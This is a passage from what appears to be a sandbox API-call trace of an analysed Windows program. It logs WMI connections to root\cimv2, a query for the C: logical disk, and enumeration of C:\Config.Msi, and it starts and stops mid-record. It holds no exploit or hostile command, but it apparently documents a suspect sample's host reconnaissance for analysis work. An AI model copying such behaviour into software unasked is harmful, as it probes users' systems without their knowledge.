puResponse=0x689f4d4*=0xc19) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetInfo (in: This=0x67385b0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f44c | out: puCount=0x689f44c*=0x0) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f438 | out: puCount=0x689f438*=0x2) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0x0, pszText=0x0 | out: puBuffLength=0x689f434*=0xf, pszText=0x0) returned 0x0 [0212.094] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f434*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.095] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f3e8 | out: ppv=0x689f3e8*=0x72015c) returned 0x0 [0212.095] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f3e0 | out: pAptType=0x689f3e0*=1) returned 0x0 [0212.095] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f3e4 | out: ppvObject=0x689f3e4*=0x0) returned 0x80004002 [0212.095] IUnknown:Release (This=0x72015c) returned 0x1 [0212.096] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ed50 | out: ppv=0x689ed50*=0x6737168) returned 0x0 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737168, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ef68 | out: ppvObject=0x689ef68*=0x0) returned 0x80004002 [0212.096] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737168, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ef7c | out: ppvObject=0x689ef7c*=0x6738310) returned 0x0 [0212.096] WbemDefPath:IUnknown:Release (This=0x6737168) returned 0x0 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eb9c | out: ppvObject=0x689eb9c*=0x6738310) returned 0x0 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eb58 | out: ppvObject=0x689eb58*=0x0) returned 0x80004002 [0212.096] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e464 | out: ppvObject=0x689e464*=0x0) returned 0x80004002 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e470 | out: ppvObject=0x689e470*=0x77da28) returned 0x0 [0212.096] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da28, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e478 | out: pCid=0x689e478*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.096] WbemDefPath:IUnknown:Release (This=0x77da28) returned 0x3 [0212.096] CoGetContextToken (in: pToken=0x689e4d0 | out: pToken=0x689e4d0) returned 0x0 [0212.096] CoGetContextToken (in: pToken=0x689e8d8 | out: pToken=0x689e8d8) returned 0x0 [0212.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e968 | out: ppvObject=0x689e968*=0x0) returned 0x80004002 [0212.097] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0212.097] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x1 [0212.097] CoGetContextToken (in: pToken=0x689f260 | out: pToken=0x689f260) returned 0x0 [0212.097] CoGetContextToken (in: pToken=0x689f1c0 | out: pToken=0x689f1c0) returned 0x0 [0212.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x689f290*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f28c | out: ppvObject=0x689f28c*=0x6738310) returned 0x0 [0212.097] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0212.097] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x2 [0212.097] WbemDefPath:IWbemPath:SetText (This=0x6738310, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0212.097] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738310, puCount=0x689f410 | out: puCount=0x689f410*=0x2) returned 0x0 [0212.097] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x689f40c*=0x0, pszText=0x0 | out: puBuffLength=0x689f40c*=0xf, pszText=0x0) returned 0x0 [0212.097] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=4, puBuffLength=0x689f40c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f40c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.097] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f410 | out: ppv=0x689f410*=0x72015c) returned 0x0 [0212.097] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f408 | out: pAptType=0x689f408*=1) returned 0x0 [0212.097] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f40c | out: ppvObject=0x689f40c*=0x0) returned 0x80004002 [0212.097] IUnknown:Release (This=0x72015c) returned 0x1 [0212.098] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f030 | out: ppv=0x689f030*=0x673d018) returned 0x0 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x673d018, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f248 | out: ppvObject=0x689f248*=0x0) returned 0x80004002 [0212.098] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d018, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f25c | out: ppvObject=0x689f25c*=0x6737128) returned 0x0 [0212.098] WbemLocator:IUnknown:Release (This=0x673d018) returned 0x0 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee7c | out: ppvObject=0x689ee7c*=0x6737128) returned 0x0 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee38 | out: ppvObject=0x689ee38*=0x0) returned 0x80004002 [0212.098] WbemLocator:IUnknown:AddRef (This=0x6737128) returned 0x3 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e744 | out: ppvObject=0x689e744*=0x0) returned 0x80004002 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e750 | out: ppvObject=0x689e750*=0x0) returned 0x80004002 [0212.098] CoGetContextToken (in: pToken=0x689e7b0 | out: pToken=0x689e7b0) returned 0x0 [0212.098] CoGetContextToken (in: pToken=0x689ebb8 | out: pToken=0x689ebb8) returned 0x0 [0212.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec48 | out: ppvObject=0x689ec48*=0x0) returned 0x80004002 [0212.099] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x2 [0212.099] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x1 [0212.099] CoGetContextToken (in: pToken=0x689f228 | out: pToken=0x689f228) returned 0x0 [0212.099] CoGetContextToken (in: pToken=0x689f188 | out: pToken=0x689f188) returned 0x0 [0212.099] WbemLocator:IUnknown:QueryInterface (in: This=0x6737128, riid=0x689f258*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f254 | out: ppvObject=0x689f254*=0x6737128) returned 0x0 [0212.099] WbemLocator:IUnknown:AddRef (This=0x6737128) returned 0x3 [0212.099] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x2 [0212.099] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738310, puCount=0x689f3ec | out: puCount=0x689f3ec*=0x2) returned 0x0 [0212.099] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=8, puBuffLength=0x689f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x689f3e8*=0xf, pszText=0x0) returned 0x0 [0212.099] WbemDefPath:IWbemPath:GetText (in: This=0x6738310, lFlags=8, puBuffLength=0x689f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0212.099] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f2c4 | out: ppv=0x689f2c4*=0x67370c8) returned 0x0 [0212.099] WbemLocator:IWbemLocator:ConnectServer (in: This=0x67370c8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f358 | out: ppNamespace=0x689f358*=0x674836c) returned 0x0 [0216.721] WbemLocator:IUnknown:QueryInterface (in: This=0x674836c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1f4 | out: ppvObject=0x689f1f4*=0x781724) returned 0x0 [0216.721] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781724, pProxy=0x674836c, pAuthnSvc=0x689f244, pAuthzSvc=0x689f240, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c, pImpLevel=0x689f22c, pAuthInfo=0x689f230, pCapabilites=0x689f234 | out: pAuthnSvc=0x689f244*=0xa, pAuthzSvc=0x689f240*=0x0, pServerPrincName=0x689f238, pAuthnLevel=0x689f23c*=0x6, pImpLevel=0x689f22c*=0x2, pAuthInfo=0x689f230, pCapabilites=0x689f234*=0x1) returned 0x0 [0216.721] WbemLocator:IUnknown:Release (This=0x781724) returned 0x1 [0216.721] WbemLocator:IUnknown:QueryInterface (in: This=0x674836c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e8 | out: ppvObject=0x689f1e8*=0x781744) returned 0x0 [0216.721] WbemLocator:IUnknown:QueryInterface (in: This=0x674836c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f1e4 | out: ppvObject=0x689f1e4*=0x781724) returned 0x0 [0216.721] WbemLocator:IClientSecurity:SetBlanket (This=0x781724, pProxy=0x674836c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0216.722] WbemLocator:IUnknown:Release (This=0x781724) returned 0x2 [0216.722] WbemLocator:IUnknown:Release (This=0x781744) returned 0x1 [0216.722] CoTaskMemFree (pv=0x77df98) [0216.722] WbemLocator:IUnknown:Release (This=0x67370c8) returned 0x0 [0216.722] WbemLocator:IUnknown:QueryInterface (in: This=0x674836c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ede4 | out: ppvObject=0x689ede4*=0x781744) returned 0x0 [0216.722] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eda0 | out: ppvObject=0x689eda0*=0x0) returned 0x80004002 [0216.726] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ebbc | out: ppvObject=0x689ebbc*=0x0) returned 0x80004002 [0216.728] WbemLocator:IUnknown:AddRef (This=0x781744) returned 0x3 [0216.728] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0216.730] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6ac | out: ppvObject=0x689e6ac*=0x0) returned 0x80004002 [0216.734] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e6b8 | out: ppvObject=0x689e6b8*=0x7816a4) returned 0x0 [0216.734] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7816a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e6c0 | out: pCid=0x689e6c0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0216.734] WbemLocator:IUnknown:Release (This=0x7816a4) returned 0x3 [0216.735] CoGetContextToken (in: pToken=0x689e718 | out: pToken=0x689e718) returned 0x0 [0216.735] CoGetContextToken (in: pToken=0x689eb20 | out: pToken=0x689eb20) returned 0x0 [0216.735] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebb0 | out: ppvObject=0x689ebb0*=0x78172c) returned 0x0 [0216.735] WbemLocator:IRpcOptions:Query (in: This=0x78172c, pPrx=0x781744, dwProperty=2, pdwValue=0x689ebd8 | out: pdwValue=0x689ebd8) returned 0x80004002 [0216.735] WbemLocator:IUnknown:Release (This=0x78172c) returned 0x3 [0216.735] WbemLocator:IUnknown:Release (This=0x781744) returned 0x2 [0216.735] CoGetContextToken (in: pToken=0x689f0f8 | out: pToken=0x689f0f8) returned 0x0 [0216.735] CoGetContextToken (in: pToken=0x689f058 | out: pToken=0x689f058) returned 0x0 [0216.735] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x689f128*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f124 | out: ppvObject=0x689f124*=0x674836c) returned 0x0 [0216.735] WbemLocator:IUnknown:AddRef (This=0x674836c) returned 0x4 [0216.735] WbemLocator:IUnknown:Release (This=0x674836c) returned 0x3 [0216.735] WbemLocator:IUnknown:Release (This=0x674836c) returned 0x2 [0216.735] SysStringLen (param_1=0x0) returned 0x0 [0216.735] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x689f4bc | out: puCount=0x689f4bc*=0x0) returned 0x0 [0216.735] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4b8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4b8*=0x20, pszText=0x0) returned 0x0 [0216.735] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4b8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4b8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.735] CoGetContextToken (in: pToken=0x689f128 | out: pToken=0x689f128) returned 0x0 [0216.735] WbemLocator:IUnknown:AddRef (This=0x781744) returned 0x3 [0216.735] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efbc | out: ppvObject=0x689efbc*=0x781744) returned 0x0 [0216.735] WbemLocator:IUnknown:Release (This=0x781744) returned 0x3 [0216.736] WbemLocator:IUnknown:Release (This=0x781744) returned 0x2 [0216.736] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0x20, pszText=0x0) returned 0x0 [0216.736] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x689f4c0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0216.736] IWbemServices:GetObject (This=0x674836c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f474*=0x0, ppCallResult=0x0) Thread: id = 129 os_tid = 0xb08 [0131.194] SysReAllocStringLen (in: pbstr=0x66af63c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x66af63c*="KERNEL32.DLL") returned 1 [0131.194] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.195] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.197] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.197] SysReAllocStringLen (in: pbstr=0x66af63c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x66af63c*="KERNEL32.DLL") returned 1 [0131.197] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.198] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.200] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.201] SysReAllocStringLen (in: pbstr=0x66af618*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x66af618*="KERNEL32.DLL") returned 1 [0131.201] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.201] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.203] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.206] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.207] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x66af26c) returned 1 [0131.208] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x66aed74, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0131.208] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x66aed48, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0131.208] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x66aef94 | out: lpFindFileData=0x66aef94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77ab70 [0131.209] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x66aefa4 | out: lpFindFileData=0x66aefa4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.209] FindNextFileW (in: hFindFile=0x77ab70, lpFindFileData=0x66aefa4 | out: lpFindFileData=0x66aefa4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0131.209] FindClose (in: hFindFile=0x77ab70 | out: hFindFile=0x77ab70) returned 1 [0131.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x66af22c) returned 1 [0131.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x66af238) returned 1 [0131.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x66af26c) returned 1 [0131.209] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x66aed74, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0131.209] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x66aed48, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0131.209] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x66aef94 | out: lpFindFileData=0x66aef94*(dwFileAttributes=0x16, 